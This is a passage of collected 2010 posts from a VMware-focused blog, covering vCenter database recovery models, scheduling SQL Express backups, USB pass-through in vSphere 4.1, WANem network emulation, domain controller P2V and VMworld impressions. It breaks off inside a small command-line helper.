WANem is a very nice, and simple to set up, little appliance that can make planning deployments and emulating real-world scenarios much easier. After all, do you know how your applications behave over high-latency connections? Or if you get jitter problems or even dropped packets? Give it a test; you might just be a bit surprised at the results.

---

# vNinja used by VMware

URL: https://vNinja.net/news/vninja-used-by-vmware/
Date: 2010-12-27
Author: christian
Tags: Documentation, Presentation, Virtualization, VMware

Thanks to Maish Saidel-Keesing, vExpert 2010 and blogger over at Technodrone, I have been made aware that VMware has used one of my posts here on vNinja in their internal presentation material. The material in question is vSphere 4.1 to 4.0 differences (pages 44 and 45 in vSphere 4.1 Deep Dive - Part 1 - v6.pptx), where my post about Using USB Pass-through in vSphere 4.1 is quoted and my screenshots used. I guess no-one else had tested USB passthrough in vSphere 4.1 with USB based UPS setups before I did.
While I think this is great, and I’m really honored that my content here can be used as internal VMware resources, I must say that I would have loved to be notified, and asked, by Iwan Rahabok when he created the material. Iwan did provide links and source attribution in his presentation, but a direct message from him would have been great as well.

---

# Virtual Admins - Virtual Pirates?

URL: https://vNinja.net/virtualization/virtual-admins-virtual-pirates/
Date: 2010-12-23
Author: christian
Tags: Maintenance, realworld, Virtualization, VMware

When Rich Brambley posted “A Pirate Invented Server Virtualization” today, it reminded me of a little story from my own production environment. This story is a couple of years old, but sadly it’s still valid. A very specialized application that we run requires a SQL Server Express instance, a proxy/licensing server and a client installation with license files to work. This application isn’t very advanced, nor very resource intensive, so by nature it’s prime for running in a virtualized environment. None of the application developer’s customers had ever attempted setting it up in a virtualized environment, and so we offered to be a pilot customer and test it live in our environment. The testing confirmed what we thought: it worked perfectly when virtualized! We were happy, and so were the developers. At least, that’s what we thought. In fact, what happened next is one of the more bizarre fallouts I’ve personally seen when it comes to implementing a “virtualize first” strategy. When we got the final version of the software, out of the testing phase, I went about my business of installing and configuring it. All was fine, until I got to the part where I was supposed to install the proxy/licensing service. It turns out that the application developers had put checks in place to prevent installation on virtual machines!
After we tested and verified the solution in our environment, the developer turned around and blocked us from implementing it as we wished. In fact, we still run this service on one of the few physical servers we still have in place in our data center. If it were up to me, I would have kicked the application right out of our environment, but sadly core parts of our business rely on this application and we are stuck with it. The developer’s reasoning was that it was way too easy to duplicate the proxy/licensing service in a virtual environment, and by doing that we could potentially bypass the concurrent user license model they had put in place. Their checks are based on a hardware ID generated by the physical hardware, which could potentially be identical if we duplicated the VMs. They could of course work around that by using the server DNS name as one of the hardware ID checks, or even the NIC MAC address, but sadly they opted to completely block the installation and operation of that particular part of their infrastructure if you run virtualized. Bad call? Very much so, and I have made this very clear to them, to no avail. So, perhaps Dilbert is right? Was virtualization indeed created by pirates? I would rather be a Ninja than a Pirate any day.

---

# Developer meets PowerCLI - awesomeness ensues

URL: https://vNinja.net/virtualization/developer-meets-powercli-awesomeness-ensues/
Date: 2010-10-15
Author: christian
Tags: Ops, PowerCLI, PowerGui, Powershell, vCenter, Virtualization, VMware, vSphere

A couple of days ago, while I was at VMworld Europe, I got the following tweet from Asbjørn A. Mikkelsen (@neslekkim) (translated from Norwegian):

> @h0bbel Do you know if I can script something against vCenter to duplicate (or create from template) VMs, and also start/stop them?

My immediate response was, of course, to suggest using PowerCLI.
Asbjørn, who works as a full time developer, jumped at PowerCLI immediately and within a very short time frame came up with a PowerCLI script for the task at hand. You can download the script and play around with it if you want. The inline documentation is in Norwegian, and if Asbjørn had intended to redistribute the script I’m sure he would have optimized it more than the current revision. The point here isn’t the implementation itself, but rather the fact that he was able to put this automation routine together very quickly, and completely without prior knowledge of PowerCLI at all. I do feel bad for not pointing him to PowerGUI and the VI Toolkit PowerPack before he sat down and crafted this in Notepad, though. I’m sure he cursed me silently as soon as I pointed them out to him, as that combination makes this kind of automation so much easier.

---

# VMworld.next - a couple of suggestions

URL: https://vNinja.net/virtualization/vmworld-next-a-couple-of-suggestions/
Date: 2010-10-15
Author: christian
Tags: Virtualization, VMware, vmworld

Now that the VMworld events are over for 2010, I’m still trying to digest a lot of the impressions I’ve had over the past few days. However, I do have a couple of suggestions I would like to voice:

**Add contact information to the attendee badge!** Just like David Owen (@vMackem) suggested, adding Twitter ID and blog link to the attendee badge would make it easier to keep track of everyone you meet up with. I would even take it a step further, and actually add a QR code with the contact info in it directly to the badge. That way, we could all run around and scan each other! (Not as dirty as it might sound!). No more need for business card exchanges; business cards you eventually lose anyway.

**Lab availability at the event** I’ve mentioned that I want the labs extended to year-round online availability in all its cloudiness, but how about giving attendees the possibility to run the labs from their own computers while at VMworld?
Thanks for that idea, gcballard!

---

# VMworld Europe 2010 – The aftermath

URL: https://vNinja.net/virtualization/vmworld-europe-2010the-aftermath/
Date: 2010-10-15
Author: christian
Tags: conference, VMware, vmworld

I’m back home again, after spending the better part of this week in Copenhagen attending VMworld Europe 2010. Let me just say, straight off the bat, that attending VMworld is probably the best idea I’ve had in years. In reality, that’s not saying much, but the value of attending is immense. The way VMworld is organized, with lots of simultaneous sessions, labs and other activities, is both a challenge and a blessing. It’s a challenge in the sense that you need to plan your schedule pretty well and really take control over your own experience. The blessing is that you’re not locked into a predetermined path, and you can re-arrange your schedule at any time if you wish to do so. And trust me, you’ll plan one thing and probably end up doing something completely different in the end. A lot of my time was spent in the Social Media and Blogger lounge that VMware and John Troyer’s social media team had kindly set up. It was amazing to finally meet some of the people I’ve been interacting with for years without ever meeting them in person. To paraphrase Bas Raayman: “The average IQ drops 20 points every time I enter the lounge”. I don’t think Bas is right, not in his case anyway, but actually being able to discuss cloud and lab availability with John Arrasjid and stretched cluster scenarios with Scott Lowe and Lars Trøen is just amazing. Now, this wasn’t supposed to be a name-dropping post, but in essence the value of VMworld is what you make it out to be. You can be in sessions all day long, or you can split your time between the sessions and labs. In fact, you can even skip all the sessions, since they will all be available online a week or so after the conference. For me, the biggest value was the social networking part of it all.
My current mantra is “The network is everything”, but I might just have to change that into “your social network is everything” now. In fact, the slogan “Virtual Roads. Actual Clouds.” could probably be changed to “Virtual Systems. Actual People.” Now I just need some time to digest it all, and it will be very interesting to see what opportunities might arise from it. Remember, it’s all in the (social) network.

---

# Extending VMworld Labs

URL: https://vNinja.net/virtualization/extending-vmworld-labs/
Date: 2010-10-13
Author: christian

Undoubtedly one of the most popular “features” of VMworld 2010, both in the US and in the EU, is the labs. These hands-on exercises in configuring and using various VMware products let you play around without the need for lab equipment or licenses installed locally. What if VMware extended this to not only run during the VMworld conferences? Let us get our hands dirty all year round! It’s hard to have a full lab setup in the office, and if we could book time in the VMware Cloud Lane to play around with VMware vCloud™, VMware vCenter™ Site Recovery Manager or even VMware ThinApp™, that would be great! I’m sure VMware can see the value in providing their customers and partners with hands-on labs for training purposes, as well as it being a great showcase for their core “cloud” services as enterprise ready. While I’m not suggesting they give everyone and their mother lab access 24/7/365, VMware should indeed offer a way for customers and partners to book time and play around. After all, VMware want us to buy their products and their vision for the cloud, don’t they?

---

# VMworld Europe 2010 Contest Over

URL: https://vNinja.net/virtualization/vmworld-europe-2010-contest-over/
Date: 2010-10-12
Author: christian

They found me! Well, not they, but Duco Jaspars (@vConsult) found me straight after the keynote and was promptly handed the Trainsignal VMware vSphere Pro Series Training Vol. 2 training kit.
## Duco Jaspars (@vConsult)

Gerben Kloosterman has posted some pictures of the handover as well.

---

# VMworld Europe 2010 Pictures

URL: https://vNinja.net/news/vmworld-europe-2010-pictures/
Date: 2010-10-12
Author: christian

---

# VMworld Europe 2010

URL: https://vNinja.net/virtualization/vmworld-europe-2010/
Date: 2010-10-10
Author: christian
Tags: contest, fun, vmworld

VMworld Europe 2010 is close. Very close. In fact, lots of people are already in place in Copenhagen; personally, I don’t get in until tomorrow evening (the 11th). Since I get in pretty late, I really hope I’ll be able to get to my hotel quickly, and then find Custom House for the Tweetup/VMUG Party. Remember, I have a little contest going, where you can win a copy of Trainsignal VMware vSphere Pro Series Training Vol. 2. In case you are wondering how to find me, well, I’m not really sure how you should go about doing that. Use your imagination! If you do need some help locating me, check my twitter stream and/or Foursquare, and here is a recent picture as well. Good luck!

## Photographic proof that the prize exists

---

# vCenter 4.1 Database Recovery Model Defaults

URL: https://vNinja.net/virtualization/vcenter-4-1-database-recovery-model-defaults/
Date: 2010-10-04
Author: christian
Tags: Backup, Maintenance, Ops, SQL Server Express, vCenter, vSphere

Sometimes leaving the defaults in place might just come back and bite you, hard. That might also be the case with your vCenter 4.1 database, as I experienced back in July. All of a sudden my vCenter Server stopped working. The symptoms were pretty obvious: my client couldn’t connect to the vCenter server. Naturally I connected to the server, and noticed that the VMware VirtualCenter Server service had indeed stopped. No wonder the client couldn’t connect to it. I tried starting it, but it would shut itself down again after a few seconds.
The next step, obviously, was to look at the event logs, and there it was, in plain English, explaining the service’s desire to stop:

```
Log Name:      Application
Source:        MSSQL$SQLEXP_VIM
Date:          17.07.2010 02:06:16
Event ID:      9002
Task Category: (2)
Level:         Error
Keywords:      Classic
User:          SYSTEM
Computer:      [removed]
Description:
The transaction log for database 'VIM_VCDB' is full. To find out why space in
the log cannot be reused, see the log_reuse_wait_desc column in sys.databases
```

The important bit: The transaction log for database ‘VIM_VCDB’ is full. As it turns out, the transaction log for my SQL Server Express based vCenter install database was indeed full. Not only was it full, it had grown to eat just about each and every byte of the disk space on the server. I got around this by changing the recovery model back to simple, and performing a new backup via the script I’ve mentioned earlier: Scheduling vCenter Backups. I’m not saying this is how you should configure your own vCenter recovery model; you need to choose one that fits your specific backup scheme. Just make sure you understand how the different settings affect your particular environment. So, where do the defaults come into play? As VMware explains in KB Article 1001046: SQL Server Recovery Model Affects Transaction Log Disk Space Requirements, the install defaults to the bulk-logged recovery model. This model allows the transaction log to grow until a log backup clears it and lets it start over. If you, like me, used a scripted backup that doesn’t do transaction log pruning, you might very well be in the same predicament pretty soon. So, take my advice: make sure you understand the backup routines you have in place for your vCenter, and check those log settings before your vCenter stops unexpectedly. Do yourself a favour, check your log files and do it now.
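The check and the fix described above can be sketched in PowerShell. This is a hedged sketch only: it assumes Invoke-Sqlcmd is available on the vCenter server, and that the instance name matches the default SQL Express install seen in the event log source; adjust names for your environment, and make sure the simple recovery model actually fits your backup strategy before changing anything.

```powershell
# Ask SQL Server why the VIM_VCDB log cannot be truncated.
# Instance name taken from the event log source (MSSQL$SQLEXP_VIM).
Invoke-Sqlcmd -ServerInstance ".\SQLEXP_VIM" -Query @"
SELECT name, recovery_model_desc, log_reuse_wait_desc
FROM sys.databases
WHERE name = 'VIM_VCDB';
"@

# If log_reuse_wait_desc says LOG_BACKUP and your backup scheme never takes
# transaction log backups, switching to the simple recovery model keeps the
# log from growing without bound.
Invoke-Sqlcmd -ServerInstance ".\SQLEXP_VIM" `
    -Query "ALTER DATABASE VIM_VCDB SET RECOVERY SIMPLE;"
```

With the simple recovery model, point-in-time restores are no longer possible; that trade-off only makes sense if, as in my case, the backup scheme relies on full backups anyway.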
Of course, this is not the only thing that has an effect on your vCenter database size. The settings for vCenter Server Statistics also come into play, but in my case the issue was the backup scheme I had in place combined with the default settings of a new vCenter 4.1 install.

---

# Going to VMworld Europe 2010 Contest: Where is Christian?

URL: https://vNinja.net/virtualization/going-to-vmworld-europe-2010-contest-where-is-christian/
Date: 2010-09-24
Author: christian
Tags: vmworld, fun, contest

Today I finally got word that I will indeed be going to VMworld Europe 2010 in Copenhagen! I’ve done the registration process, so all that remains is to book the flight and hotel and I’m ready to go. To celebrate this, I’ve decided to announce a little contest:

## Where is Christian aka h0bbel?

The first person to find me, as in the physical me, in the Bella Center during VMworld Europe 2010 (I’ll be there Tuesday - Thursday) will receive a free copy of the Trainsignal VMware vSphere Pro Series Training Vol. 2 training package. No strings attached. All you have to do is find me and say “Hi”. :-) See you all there, and no, I won’t be wearing a red and white striped sweater and a beanie. I think.

---

# VMware vSphere Hypervisor Licensing and Cost

URL: https://vNinja.net/virtualization/vmware-vsphere-hypervisor-licensing-and-cost/
Date: 2010-09-22
Author: christian
Tags: Ops, vCenter, Virtualization, VMware

We all know, and love, the fact that vSphere Hypervisor is free of charge. The free version doesn’t come with all the bells and whistles of the fully licensed product, but it’s still very usable in many scenarios. Recently I’ve been investigating the possibilities of running vSphere Hypervisor on a number of floating branch offices, also known as vessels.
I’m not going into details about the proposed setup and how we intend to roll it out, but one of the things I really wanted to get out of this was to have all my off-site vSphere Hypervisor installs appear in my vCenter Client. I don’t need HA, DRS, DPM or any of the other licensed features, and I’d be happy running the free edition if only it was able to connect to an existing vCenter installation. Sadly, and understandably, this isn’t possible in the free edition, so I looked into what it would cost to license the installs to make this a possibility. After investigating a bit, it seems that I would need to buy VMware vSphere Standard licenses for all the vessels to be able to get what I want. For 20 vessels, with the standard pricing available on vmware.com, including 1 year of support, we come up with this (all prices in USD):

| Hosts | vSphere Standard license cost incl. support | Total cost |
|-------|---------------------------------------------|------------|
| 20    | 1,318                                       | 26,360     |

In effect, this means that I would need to pay $26,360 USD to be able to get my vSphere Hypervisor hosts connected to my existing vCenter. That simply isn’t feasible in the current situation. Remember, I do not need any of the other features that vSphere Standard provides, like Thin Provisioning, High Availability, vMotion, vStorage APIs for Data Protection and Update Manager. Update Manager could potentially be useful, but that’s about it. So, dear VMware: have you considered this scenario at all? I’m sure I’m not the only customer looking to deploy vSphere Hypervisor in remote locations, where each host will run a single VM and their poor admin wants to have them all managed in a single console. I would really like to see a “vCenter Connector” license for vSphere Hypervisor that only provides a way to connect to an existing licensed vCenter instance. Is this too much to ask for? I understand that VMware wants to get paid for their enterprise products, and I’m normally happy to do so, but in this case the return simply does not warrant the cost.
--- # P2V a Domain Controller? Why would you? URL: https://vNinja.net/virtualization/p2v-a-domain-controller-why-would-you/ Date: 2010-09-21 Author: christian Tags: Maintenance, Ops, Virtualization Some topics seem to pop up at random intervals, one of them being virtualizing Microsoft Active Directory Domain Controller servers. The question is often either "Should I virtualize my Domain Controllers, and if so, should I virtualize all of them?" or "Should I do a P2V (Physical 2 Virtual) conversion of my existing Domain Controllers, or create new ones?" In this post, I'll be talking about the second question. While there is a lot to be said about the first one as well, I'll leave that for a future post. Most businesses have an existing Active Directory when they decide to virtualize. There might be different reasons for going virtual with regards to Active Directory, but in my mind there are close to no scenarios where I would even consider doing a P2V conversion of a Domain Controller. The reasons for this are plenty:

- **You need to do a cold conversion.** You absolutely should not do a hot P2V migration of a DC. If you attempt a hot migration, you will end up with a domain controller that is out of sync with the others, lots of issues, and a really painful headache.
- **Never power on the old server.** The old server, the one you did a cold P2V migration of, must never be powered back on after the new virtual instance is started. If it gets powered back on, you will once again be in a world of hurt.
- **Potential cleanup problems.** You need to clean up the old driver stack (most P2V tools will do this for you), and you might end up with, for instance, two network cards that share the same IP, one of them hidden from view and not easily removed. This could in turn cause the DNS service on a converted domain controller to bind to the wrong network interface. And we all know what happens to Active Directory if DNS doesn't work right.
I'm sure there are many other potential issues as well, like Kerberos authentication or trust failures and so on. This is not a situation you want to end up in, especially not in your production environment. Gabrie van Zanten recently published a recipe for P2V migrations of existing Domain Controllers, called Virtualizing a domain controller, how hard can it be? and I'm confident that this method would probably work out fine. My question is this: why would you want to do this in the first place? It's not like it's hard to set up a new Domain Controller, make sure it replicates properly with the existing physical or virtual ones, transfer any FSMO roles the soon-to-be-decommissioned Domain Controller holds to the new instance, and then safely remove Active Directory from the old server. Of course, Gabe has a point when he mentions that the issues you might get from a botched P2V of a Domain Controller would be the same as with old-style bad management, like using Symantec Ghost on a DC and rolling back to an old image if something fails, but why risk it at all? Deploying a new Windows Server 2008 R2 VM, running dcpromo and setting up DNS does not take long, nor is it very complex to do. I have not timed this, but I seriously doubt that creating a cold P2V migration boot device, shutting down the physical server, booting the cold migration tool, doing the actual P2V conversion and powering on the new VM takes less time than setting up a new VM. You might argue that you will have to install anti-virus and backup agents, and possibly other tools, on the new VM as well, but if your infrastructure is reasonably set up with automation tools this should not really be a factor. Besides, if you do it this way you have a return path; after all, you haven't removed anything! In fact, I'm pretty sure this whole post took longer to write than it would take to actually set up a new Domain Controller in my production environment. 
My conclusion is: don't bother risking a P2V of a Domain Controller. Set up a new VM instead; it's easy, quick and risk-free. In other words, as the vSensei would say: "just because you can, no mean you should". So Gabe, as far as this one goes; You're on your own! ;-) --- # Redesigning the vCenter Client? URL: https://vNinja.net/virtualization/redesigning-the-vcenter-client/ Date: 2010-09-20 Author: christian Tags: Ops, vCenter, Virtualization, VMware, vSphere A fresh blog post called "Resource pools and simultaneous vMotions" by Frank Denneman prompted a quick Twitter discussion regarding the vCenter client (and perhaps even vCenter itself). A simple "Why are there no folders under the Hosts and Clusters view?" from Maish Saidel-Keesing got the ball rolling. Could it be that the design of the client itself helps perpetuate the myth that resource pools are organizational units, ones that should be used as a way of grouping VMs? As Frank says; "This is not (the) reason why VMware invented resource pools." I'm not going to get into why this is a bad idea; both Frank and Duncan will have far more intelligent feedback for you if you are interested in discussing it. Now, if you could redesign the vSphere Client, based on your own experience, what would you change? I can see that in many cases, a lightweight vCenter "Simple Mode" client would do the trick. Give your VM admins the Simple Mode client, and they won't have to worry about resource pools, HA/DRS and other advanced features. Let them administer the VMs: adding networking, powering on/off and so on. The same applies to your storage admins. Give them a small, limited client that only allows them to configure storage aspects. I know you can do most of this with permissions, but I still feel a limited client could be one way to go. In other cases, like mine, splitting the client into smaller chunks won't help. As in most SMBs, I wear a lot of different hats during a normal working day. 
I'm the networking-/storage-/operating-systems-guy in a small shop, where there simply isn't room for delegating all these tasks to specialized teams or even other admins. Perhaps dividing the client into specialized sub-topics would help? A task-based user experience where you select between "VM Operations", "vSphere Operations", "Storage Operations" or "Network Operations" as your initial choice, and the client then limits what you can configure accordingly, would help organize the screen real estate. You could also have sub-sections like "Monitoring VMs", "Monitoring Storage" and so on, displaying a performance overview as the initial point of entry. You could still have an "Advanced Mode" that works the same way the vCenter Client works today, but the default would be a simplified experience based on the task you have at hand. Am I completely out on a limb here, or is this semi-rant making some sense, somewhere? What would you change, and how? --- # HP ProLiant MicroServer - Not Quite There Yet? URL: https://vNinja.net/news/hp-proliant-microserver-not-quite-there-yet/ Date: 2010-09-09 Author: christian Tags: When HP announced their new ProLiant MicroServer, I really hoped it would be the perfect answer to a specific use case I've been looking at lately. Basically, what I'm looking for is a small-chassis, low-noise branch office server that would host a single virtual machine, offering Read-Only Domain Controller (RODC) and Distributed File System (DFS) file shares. Initially it looked to fit the bill perfectly:

- Small footprint? Check.
- Low noise levels? Check.

But, sadly, that's where it stops. The first version of the HP ProLiant MicroServer comes with one CPU offering, namely the AMD Athlon II NEO N36L, which isn't all that much to run even a single-VM ESXi instance on. 
The current tech spec page does not go into much detail about the storage controller, other than that it's an "Integrated 4 port SATA RAID Storage Controller", which makes it impossible to check for compatibility on the official VMware HCL. The 1GbE NC107i NIC supplied with the server does seem to be supported by VMware, at least according to the ProLiant option VMware support matrix. I understand that HP created this server for a different use case than the one I'm outlining here, and you can't really criticize them for that. I just hope this is the first of several offerings from HP, and that the next version comes with better CPU options. A proper CPU would make this baby the perfect entry-level, small-footprint, low-noise branch-office server. Update: Simon Seagrave has posted a "somewhat" more verbose analysis of the HP ProLiant MicroServer: New HP Proliant MicroServer – a decent vSphere lab server candidate?. His conclusion is pretty much the same as mine though; give us more CPU and a vSphere-supported RAID controller and we're all set. I couldn't agree more. --- # Using the WANem WAN Emulator Virtual Appliance URL: https://vNinja.net/network/using-the-wanem-wan-emulator-virtual-appliance/ Date: 2010-08-26 Author: christian Tags: Free Tools, Networking, Ops, Simulation, vCenter, Virtual Appliance, VMware During preparation and preliminary information gathering for a new internal project, I needed to emulate various networking conditions and scenarios. More specifically, I'm looking at the possibility of running the vCenter Client over high-latency satellite links, with varying bandwidth availability and even packet loss. Obviously the best way of testing this, in a controlled environment, is to use some kind of WAN emulator that lets you control the various networking characteristics. WANem is a free WAN emulator, and it even comes as a VMware virtual appliance. 
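Before firing up an emulator, it can be useful to put rough numbers on such a link. The sketch below is my own back-of-the-envelope math, not anything WANem provides: it assumes packet losses are independent and that the emulator's delay is added once per traversal, and uses 500 ms of delay and 25% loss as example values.

```python
# Rough figures for a lossy, high-latency emulated link.
# Assumptions (mine, not WANem's): independent packet loss, and the
# configured delay is added once each time traffic crosses the appliance.

def expected_attempts(loss: float) -> float:
    """Expected transmissions per packet when each attempt is lost
    independently with probability `loss` (geometric distribution)."""
    return 1.0 / (1.0 - loss)

def min_rtt_ms(base_rtt_ms: float, added_delay_ms: float,
               traversals: int = 1) -> float:
    """Lower bound on round-trip time with the emulator in the path."""
    return base_rtt_ms + added_delay_ms * traversals

print(expected_attempts(0.25))   # 25% loss -> about 1.33 sends per packet
print(min_rtt_ms(1.0, 500.0))    # ~1 ms LAN RTT plus 500 ms of delay
```

With numbers like these it is no surprise that a chatty GUI client feels sluggish over satellite links; the point of an emulator is to experience that in the lab before the users do in production.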
Setup is pretty straightforward, and I won't get into detailed instructions at this point. If someone requests it, perhaps I'll make a HOWTO post later on. After the WANem virtual appliance has been started and set up in your network environment, all you have to do is route your traffic through it. In my test environment, I decided to route all traffic between my local computer and my vCenter Server through the WANem appliance. Doing so is simple: open a cmd window with administrator privileges on your local computer and use the route command to force traffic through WANem. The command itself is: `route add {destination IP} mask 255.255.255.255 {WANem IP}`. To tune the network properties of the traffic going through WANem, open the WANem admin page in your browser and work some magic. The screenshots below are from the advanced tab. As a simple test, I decided to add 500 ms latency (delay time) and a packet loss of 25%, which worked fine. Conclusion # If you need to test how your applications or networking infrastructure behave when issues like latency, jitter and even dropped packets affect your clients, WANem seems like an easy and free route (pun intended) for testing purposes. --- # SolarWinds VM Console URL: https://vNinja.net/virtualization/solarwinds-vm-console/ Date: 2010-08-25 Author: christian Tags: Free Tools, Ops, vCenter, VMware SolarWinds has released a new free vSphere tool called SolarWinds VM Console. 
Free VM Console highlights:

- Bounce (shutdown & restart) VMs without logging into vCenter or vSphere
- Get end-to-end visibility into your VMware environment—from vCenter through ESX hosts to VM guests
- Track the real-time up/down status of your VMs from your desktop, without logging into VMware apps

Additional VM monitoring features:

- Take a snapshot of your VM prior to shutdown
- Search on VM names or IP addresses
- Use your vCenter/vSphere credentials to view a top-down hierarchy of your virtual environment

I'm not sure why you as an admin would want to use this tool instead of the vSphere Client, but in environments where you have delegated control over certain VMs (like a test environment) it might be a useful addition to your tool-belt. --- # vCenter Update Manager to lose its fat URL: https://vNinja.net/virtualization/vcenter-update-manager-to-lose-its-fat/ Date: 2010-08-24 Author: christian Tags: Ops, vCenter, vCenter Update Manager, Virtualization, VMware Player, VMware Workstation Dwayne Lessner, who runs IT Blood Pressure, has written a guest post on GestaltIT called Is My Favourite vSphere Tool Going Away? In his article, Dwayne talks about vCenter Update Manager 4.1, and the fact that it seems to be the last version of the tool that will allow you to patch your Windows and Linux guests: VMware vCenter Update Manager Features.

> vCenter Update Manager 4.1 and its subsequent update releases are the last releases to support scanning and remediation of patches for Windows and Linux guest operating systems and applications running inside a virtual machine. The ability to perform virtual machine operations such as upgrade of VMware Tools and virtual machine hardware will continue to be supported and enhanced. (VMware vSphere 4.1 release notes)

Dwayne talks about this as being a bad thing, and that's where I disagree. 
I have never understood why VMware saw it as their job to patch the operating systems the guests are running, and I had yet to see anyone actually use this feature. Obviously I was wrong, someone does indeed use it, but I really can't understand why. I'm a keen believer in doing what you know, and doing it well. Let "native" patching solutions take care of the guests (Windows Server Update Services (WSUS) comes to mind) and leave vCenter Update Manager (VUM) to take care of patching your VMware products. I wouldn't mind seeing VUM extended to patch the VMware Workstation, Fusion and Player installations your enterprise might have, but I really think that losing the fat that is guest OS patching can only be a good thing. --- # vCenter Server 4.1 Performance and Best Practices URL: https://vNinja.net/virtualization/vcenter-server-4-1-performance-and-best-practices/ Date: 2010-08-24 Author: christian Tags: Documentation, Maintenance, Ops, vCenter, VMware, Whitepaper VMware has published a new whitepaper called VMware vCenter Server Performance and Best Practices. This is a must-read if you manage a vCenter 4.1 installation, or are currently planning your upgrade. The whitepaper highlights the performance improvements in the latest version, sizing guidelines, best practices and some really good real-world information from several case studies. One simple, but probably often overlooked, tip is that the number of vCenter Clients connected to your vCenter Server has an impact on its performance. How many admins consider that when they start up their clients? The whitepaper also comes complete with performance graphs comparing the latest release with the 4.0 release, based on real data from several case studies. If you only read one whitepaper (this week), let it be this one. You will not regret it, I promise. --- # Where in the world is VMware Server? 
URL: https://vNinja.net/virtualization/where-in-the-world-is-vmware-server/ Date: 2010-08-13 Author: christian Tags: vCenter, Virtualization, VMware, VMware Player, VMware Server, VMware Workstation Over at PlanetVM, Wil van Antwerpen posted The Future of VMware Server back in May 2010. Wil makes the argument that VMware does indeed seem to be abandoning VMware Server as a product, leaving us with VMware Workstation and VMware Player as the two Windows-installable virtualization solutions from the company. This has caused some reactions, including my own comment, where I question the wisdom of abandoning what might just be one of the best virtualization "gateway drugs" VMware has to offer. In my opinion, abandoning VMware Server would be a bad move, but re-reading the documentation from VMware and thinking more about the consequences made me realize something: what if VMware is working on a replacement product or management solution? I seriously doubt VMware would want to abandon the use case that VMware Server covers, even if they do abandon the VMware Server product itself. I don't have any inside knowledge about this, but let's say VMware is working on a management framework for VMware Player: something you can install, in addition to VMware Player, that lets you set auto-start parameters for VMs, run them headless and manage them remotely. Wouldn't that pretty much allow us to do the same things with VMware Player that we use VMware Server for today? The more I think about it, the more it makes sense. --- # Using USB Pass-through in vSphere 4.1 URL: https://vNinja.net/virtualization/using-usb-pass-through-in-vsphere-4-1/ Date: 2010-07-22 Author: christian Tags: ESX, Ops, USB, vCenter, Veeam, VMware, vSphere Finally, USB pass-through is possible on ESX hosts with the new vSphere 4.1 release! This feature has been available in VMware Workstation, Fusion and Player for quite a while. 
The freshly added feature in vSphere 4.1 even works if you vMotion the guest from one host to another, which is in itself pretty amazing functionality! In this post, I'll show how to set up and use the new USB pass-through feature in vSphere 4.1. Setting up USB pass-through in vSphere 4.1 # First off, we need to add a USB controller to the VM we want USB pass-through working on. This is done by firing up the vSphere Client and right-clicking the VM:

1. Select Edit Settings.
2. Click Add, find USB Controller in the list, and click Next.
3. Click Next again, and you'll be presented with a list of the USB devices currently connected to the host. If none show up, make sure the device is actually connected to the host. If your device is indeed connected but still not listed in the vSphere Client, it's not supported. In my test setup I have a small APC UPS connected to the host, so I'll add that to the VM. Also note that this is where you enable vMotion support!
4. Find your device, and click Next.
5. Review your changes and click Finish.

This returns you to the Edit Settings window. Click OK to have the USB controller and device(s) added to your VM. Connect to your VM and install the drivers, if needed, and you should be able to use your USB device directly inside the VM. Usage Scenarios # What could you possibly use this new feature to accomplish? Well, for one you could use it to connect your UPS to your management software, without having to install any management software on the host itself. In general I would recommend using UPS vendors that offer direct vCenter integration instead, but for a lab environment this should work out nicely. Another obvious usage pattern would be to connect USB dongles that some software requires, either for security or for licensing purposes. 
The one thing that springs to my mind, and the one that would probably be most useful in my environment, is to connect USB HDDs to the host and use them as a backup target for Veeam Backup & Replication. Being able to directly connect some cheap storage to the host and then pass it through to the Veeam Backup & Replication VM makes it easy to back up/replicate your VMs for manual off-site storage. Kendrick Coleman (kendrickcoleman.com) had the same idea, but unlike him I'll try to make sure my HDDs are located off-site before the fire starts! :-) I'm sure there are other usage scenarios as well, like connecting scanners, cameras and whatnot; I'm just not sure I'd like all sorts of devices connected to my hosts. --- # Scheduling vCenter Backups URL: https://vNinja.net/virtualization/scheduling-vcenter-backups/ Date: 2010-07-22 Author: christian Tags: Backup, Ops, SQL Server Express, vCenter, VMware If you run your vCenter on SQL Server Express 2005, you are missing the ability to set up scheduled backup jobs with SQL Maintenance Plans, a feature available in the full version of SQL Server. This might not be a problem if your backup software has SQL Server agents that you use to back up your vCenter database, but in smaller environments, or even in your lab, you might not have that kind of backup scheme available to you. So what do you do? Thankfully, there are ways of setting up the same kind of scheduled backups in SQL Server Express, without being a SQL Server guru. Creating a Backup Script # If you don't have SQL Server Management Studio Express installed already, download and install it now. Then:

1. Fire it up and log on with a user that has sufficient permissions to access the vCenter database.
2. Find your vCenter database by expanding Databases and selecting VIM_VCDB.
3. Right-click VIM_VCDB and select Tasks and then Back Up…

This opens the Back Up Database window, where you set your backup options. Set your options in a manner that fits your environment. 
You can set options like the backup file location, retention policy and so on. So far, this is all fine and dandy. You can create a manual backup this way, without much hassle. But how can we turn that into a scheduled job? The first step is to turn your backup options into a SQL script that can be scheduled. You do this by finding the Script drop-down menu at the top of the Back Up Database window and selecting Script Action to New Query Window. This opens the script window, where you can see the script and test it to make sure it works as intended. The next step is to save the generated script; you do so by going to File and selecting Save As…. I've created a folder called _c:\scripts_ that I use to store my SQL scripts in, so I'll save the backup script there as FullBackupVCDB.sql. Scheduling the Backup Script # Now that we have a working backup script, we need to be able to schedule it to run. As we can't do that within the SQL Server Management Studio Express application, we need to find another way of scheduling it. Windows Server 2008 R2 (and other versions) includes a scheduling tool, and that's what we'll use to create our schedule. On my standard vCenter installation, SQL Server is installed in the default location of _C:\Program Files (x86)\Microsoft SQL Server_. This means that the actual command we need to schedule will be (be sure to replace the server-/instance-name and script name if your values differ from mine): "C:\Program Files (x86)\Microsoft SQL Server\90\Tools\Binn\SQLCMD.EXE" -S [servername]\SQLEXP_VIM -i c:\scripts\FullBackupVCDB.sql Go to the Control Panel and select Scheduled Tasks. Click Create Basic Task, give it a name and set an appropriate schedule. Select Start a program as the action for the task, and when it asks for Program/Script enter "C:\Program Files (x86)\Microsoft SQL Server\90\Tools\Binn\SQLCMD.EXE" -S [servername]\SQLEXP_VIM -i c:\scripts\FullBackupVCDB.sql. 
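That command line is easy to get subtly wrong: the executable path must be quoted because it contains spaces, while the arguments must not be. If you are rolling this out to more than one vCenter, a small helper along these lines can generate it; this is my own convenience sketch (not part of any VMware tooling), using the default install path and SQLEXP_VIM instance name from above:

```python
# Assemble the sqlcmd command line for the scheduled backup task.
# The path and the SQLEXP_VIM instance name match the default vCenter
# installation described in the post; pass your own server name.

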